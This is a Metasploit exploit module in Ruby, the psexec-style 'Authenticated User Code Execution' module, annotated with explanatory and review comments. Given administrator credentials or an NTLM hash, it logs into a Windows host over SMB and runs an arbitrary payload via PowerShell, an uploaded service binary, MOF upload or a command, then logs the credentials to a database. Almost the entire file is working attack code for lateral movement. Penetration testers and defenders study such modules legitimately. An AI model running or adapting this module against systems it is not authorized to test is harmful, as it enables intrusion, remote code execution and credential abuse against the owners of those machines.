##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Windows XP systems that are not part of a domain default to treating all
# network logons as if they were Guest. This prevents SMB relay attacks from
# gaining administrative access to these systems. This setting can be found
# under:
#
# Local Security Settings >
# Local Policies >
# Security Options >
# Network Access: Sharing and security model for local accounts
# Authenticates to a remote SMB service with the supplied credentials (or
# NTLM hash, see +report_auth+) and runs the configured payload through one of
# the targets declared in +initialize+ (PowerShell, native service binary
# upload, MOF upload, or a command payload). Everything that actually touches
# the wire (+connect+, +smb_login+, +native_upload+, +mof_upload+, the
# +execute_*+ helpers, +powershell_installed?+) comes from the included mixins
# and is not defined in this file.
class MetasploitModule < Msf::Exploit::Remote
  # ManualRanking: valid administrator credentials are a precondition
  # (see 'Description' below), so this is not an automatic exploit.
  Rank = ManualRanking

  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Exploit::Powershell
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Auxiliary::Report
  include Msf::OptionalSession::SMB

  # Registers module metadata, the target list, the SMBSHARE option and the
  # advanced options consumed by the methods below.
  #
  # @param info [Hash] metadata merged via +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft Windows Authenticated User Code Execution',
        'Description' => %q{
          This module uses a valid administrator username and password (or
          password hash) to execute an arbitrary payload. This module is similar
          to the "psexec" utility provided by SysInternals. This module is now able
          to clean up after itself. The service created by this tool uses a randomly
          chosen name and description.
        },
        'Author' => [
          'hdm',
          'Royce Davis <rdavis[at]accuvant.com>', # (@R3dy__) PSExec command module
          'RageLtMan <rageltman[at]sempervictus>' # PSH exploit, libs, encoders
        ],
        'License' => MSF_LICENSE,
        'Privileged' => true,
        'DefaultOptions' => {
          'WfsDelay' => 10,
          'EXITFUNC' => 'thread'
        },
        'References' => [
          [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
          [ 'OSVDB', '3106'],
          [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ],
          [ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ],
          [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1569_002_SERVICE_EXECUTION ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_001_POWERSHELL ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_003_WINDOWS_COMMAND_SHELL ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1077_WINDOWS_ADMIN_SHARES ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1078_VALID_ACCOUNTS ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1105_INGRESS_TOOL_TRANSFER ]
        ],
        'Payload' => {
          'Space' => 3072,
          'DisableNops' => true
        },
        'Platform' => 'win',
        # Target names are matched literally by the +case+ in +exploit+;
        # keep the two lists in sync when adding or renaming a target.
        'Targets' => [
          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'PowerShell', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'Native upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          [ 'MOF upload', { 'Arch' => [ARCH_X86, ARCH_X64] } ],
          # Command payloads get a larger space budget than the binary targets.
          [ 'Command', { 'Arch' => [ARCH_CMD], 'Payload' => { 'Space' => 8191 } } ]
        ],
        # Index 0 == 'Automatic' (PowerShell if available, else native upload).
        'DefaultTarget' => 0,
        # For the CVE, PsExec was first released around February or March 2001
        'DisclosureDate' => '1999-01-01',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # SMBSHARE is optional (default ''); when it is blank, +exploit+ picks a
    # share based on the selected target.
    register_options(
      [
        OptString.new('SMBSHARE', [false, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", ''], aliases: ['SHARE'])
      ]
    )

    # ALLOW_GUEST is read in +create_simple_smb_client!+, SERVICE_FILENAME and
    # SERVICE_STUB_ENCODER in +native_upload_with_workaround+ (the encoder name
    # is validated up front by +validate_service_stub_encoder!+), and PSH_PATH
    # by the 'Automatic' branch of +exploit+.
    register_advanced_options(
      [
        OptBool.new('ALLOW_GUEST', [true, 'Keep trying if only given guest access', false]),
        OptString.new('SERVICE_FILENAME', [false, 'Filename to to be used on target for the service binary', nil]),
        OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe']),
        OptString.new('SERVICE_STUB_ENCODER', [false, 'Encoder to use around the service registering stub', nil])
      ]
    )
  end

  # Runs the mixin-provided +native_upload+ with the configured service
  # filename and stub encoder, re-establishing an SMB1 session first when the
  # peer reports itself as Windows XP.
  #
  # @param smbshare [String] share name chosen by +exploit+
  # @return the return value of +native_upload+
  def native_upload_with_workaround(smbshare)
    # Without SERVICE_FILENAME an 8-letter random name with an .exe suffix is used;
    # without SERVICE_STUB_ENCODER an empty string is passed through.
    service_filename = datastore['SERVICE_FILENAME'] || "#{rand_text_alpha(8)}.exe"
    service_encoder = datastore['SERVICE_STUB_ENCODER'] || ''

    # Avoid implementing NTLMSSP on Windows XP
    # https://seclists.org/metasploit/2009/q1/6
    # "Windows 5.1" is the XP version string; the reconnect is pinned to SMB1
    # and a fresh login is performed before the upload.
    if smb_peer_os == "Windows 5.1"
      connect(versions: [1])
      smb_login
    end
    native_upload(smbshare, service_filename, service_encoder)
  end

  # Fails fast if SERVICE_STUB_ENCODER names an encoder the framework does not
  # know about; an unset or empty option is accepted silently.
  #
  # @raise [Msf::OptionValidateError] keyed on 'SERVICE_STUB_ENCODER'
  # @return [nil]
  def validate_service_stub_encoder!
    service_encoder = datastore['SERVICE_STUB_ENCODER']
    return if service_encoder.nil? || service_encoder.empty?

    encoder = framework.encoders[service_encoder]
    if encoder.nil?
      raise Msf::OptionValidateError.new(
        {
          'SERVICE_STUB_ENCODER' => "Failed to find encoder #{service_encoder.inspect}"
        }
      )
    end
  end

  # Entry point: validate options, pick a share, obtain an authenticated SMB
  # client, dispatch on the target name, then run the handler and disconnect.
  #
  # NOTE(review): +create_simple_smb_client!+ signals a rejected Guest-only
  # login only by printing an error, disconnecting and returning; its return
  # value is not checked here, so the +case+ below still runs in that
  # situation. Confirm whether that is intended.
  def exploit
    validate_service_stub_encoder!

    # automatically select an SMB share unless one is explicitly specified
    # ('C$' for the Command target, 'ADMIN$' otherwise).
    if datastore['SMBSHARE'] && !datastore['SMBSHARE'].blank?
      smbshare = datastore['SMBSHARE']
    elsif target.name == 'Command'
      smbshare = 'C$'
    else
      smbshare = 'ADMIN$'
    end

    create_simple_smb_client!

    # Names must match the 'Targets' entries in +initialize+ exactly; a name
    # with no +when+ branch falls through to +handler+/+disconnect+ unhandled.
    case target.name
    when 'Automatic'
      # PSH_PATH is probed through the selected share to decide the branch.
      if powershell_installed?(smbshare, datastore['PSH_PATH'])
        print_status('Selecting PowerShell target')
        execute_powershell_payload
      else
        print_status('Selecting native target')
        native_upload_with_workaround(smbshare)
      end
    when 'PowerShell'
      execute_powershell_payload
    when 'Native upload'
      native_upload_with_workaround(smbshare)
    when 'MOF upload'
      mof_upload(smbshare)
    when 'Command'
      execute_command_payload(smbshare)
    end

    # Run regardless of which target branch executed.
    handler
    disconnect
  end

  # Records the credentials that just authenticated successfully as an
  # 'Admin'-level SMB login in the database (Msf::Auxiliary::Report helpers).
  #
  # Called only from +create_simple_smb_client!+ after a non-empty SMBUser has
  # been confirmed; +downcase+ below would raise on a nil SMBUser.
  #
  # @return the return value of +create_credential_login+
  def report_auth
    service_data = {
      address: ::Rex::Socket.getaddress(datastore['RHOST'], true),
      port: datastore['RPORT'],
      service_name: 'smb',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      private_data: datastore['SMBPass'],
      username: datastore['SMBUser'].downcase
    }

    # A realm is attached only for a real domain; the literal 'WORKGROUP' is
    # treated as "no domain".
    if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
      credential_data.merge!({
        realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
        realm_value: datastore['SMBDomain']
      })
    end

    # LM:NT hash pairs (32 hex chars, colon, 32 hex chars) are stored as
    # :ntlm_hash, anything else as :password.
    # NOTE(review): the pattern is unanchored, so a plain password that merely
    # contains such a substring would also be classified as a hash.
    if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
      credential_data.merge!({ :private_type => :ntlm_hash })
    else
      credential_data.merge!({ :private_type => :password })
    end

    credential_data.merge!(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      access_level: 'Admin',
      core: credential_core,
      # NOTE(review): DateTime is the legacy API; left as-is in case the login
      # model expects it — confirm before switching to Time.
      last_attempted_at: DateTime.now,
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    }

    login_data.merge!(service_data)
    create_credential_login(login_data)
  end

  # Populates +self.simple+ with an authenticated SMB client, either by
  # reusing an existing SMB session or by connecting and logging in with the
  # datastore credentials.
  #
  # On the fresh-connection path, a login that yielded only Guest privileges
  # (no +auth_user+) is rejected unless ALLOW_GUEST is set: an error is
  # printed, the connection is dropped and the method returns nil without
  # raising. A successful login with a non-empty SMBUser is recorded via
  # +report_auth+.
  #
  # @return [nil] on the Guest-rejection path; otherwise the value of the last
  #   expression executed (not used by the caller)
  def create_simple_smb_client!
    if session
      print_status("Using existing session #{session.sid}")
      self.simple = session.simple_client
    else
      print_status('Connecting to the server...')
      connect

      print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...")
      smb_login

      # auth_user is unset when the server only granted Guest access (see the
      # message below); honour ALLOW_GUEST before giving up.
      if !simple.client.auth_user && !datastore['ALLOW_GUEST']
        print_line
        print_error(
          'FAILED! The remote host has only provided us with Guest privileges. ' \
          'Please make sure that the correct username and password have been provided. ' \
          'Windows XP systems that are not part of a domain will only provide Guest privileges ' \
          'to network logins by default.'
        )
        print_line
        disconnect
        # Exits this helper only; the caller is not told the login was rejected.
        return
      end

      # Skip the database write when no username was supplied.
      unless datastore['SMBUser'].to_s.strip.empty?
        report_auth
      end

    end
  end
end